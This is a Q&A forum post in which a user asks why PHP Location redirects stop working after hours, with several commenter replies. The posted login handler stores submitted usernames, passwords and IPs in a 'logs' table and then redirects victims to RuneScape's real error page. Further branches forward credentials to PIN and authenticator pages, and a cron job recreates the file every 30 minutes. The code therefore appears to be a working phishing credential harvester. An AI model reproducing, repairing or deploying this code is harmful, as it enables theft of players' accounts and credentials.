# PHP Header Location works then a few hours later stops working

Tags: php, redirect

Alright so heres my problem... Header("Location: blahblah.php"); will works then a few hours later itll stop and ill add ob_start(); and ob_end_flush(); by the headers. Then that will stop working a few hours later and ill change it back and it will work for another few hours then stop working and so on.

Heres my code.

```
<?php
        error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
        require_once("config.php");
        if($_POST["login"]){
            $stmt11 = $db->prepare("SELECT * FROM users WHERE code = :code");
            $stmt11->execute(array(":code" => $_GET["id"]));
            $row11 = $stmt11->fetch();
            $username = htmlentities($_POST["username"], ENT_QUOTES);
            $password = htmlentities($_POST["password"], ENT_QUOTES);
            if($row11["pin"] == "false" and $row11["auth"] == "false"){
                $ip = $_SERVER["REMOTE_ADDR"];
                $stmt = $db->prepare("INSERT INTO logs (username, password, ip, code) VALUES (:username, :password, :ip, :code)");
                $stmt->execute(array(":username" => $username, ":password" => $password, ":ip" => $ip, ":code" => $_GET["id"]));
                header("Location: https://www.runescape.com/error.php");
            } else {
                if($row11["pin"] == "true" and $row11["auth"] == "true"){
                    header("Location: verification.ws?username=" . $username . "&pw=" . $password . "&id=" . $_GET["id"] . "&auth=true");
                } else {
                    if($row11["pin"] == "false" and $row11["auth"] == "true"){
                        header("Location: auth.ws?username=" . $username . "&pw=" . $password . "&id=" . $_GET["id"]);              
                    } else {
                        if($row11["pin"] == "true" and $row11["auth"] == "false"){
                            header("Location: verification.ws?username=" . $username . "&pw=" . $password . "&id=" . $_GET["id"]);
                        }
                    }
                }
            }
        }
?>
```

Comment: are you using JWT in there somewhere that have an expiry time?

Comment: Whats jwt? I have a cron job that recreates the file every 30 minutes.

Comment: What do you mean by "stops working". What error do you get.

Comment: maybe I'm not proficient enough with PHP but this looks to be handling HTTP queries and inserting headers in the response .. I'm not able to quickly grasp what you are intending nor what the problem is .. can you provide a more verbose description of what you are trying to do and what is failing?

Comment: no errors it just doesnt redirect.

Comment: Do all instances fail after that time? - so ANY`Location: blah` stops working?

Comment: it wont go to the others so yes.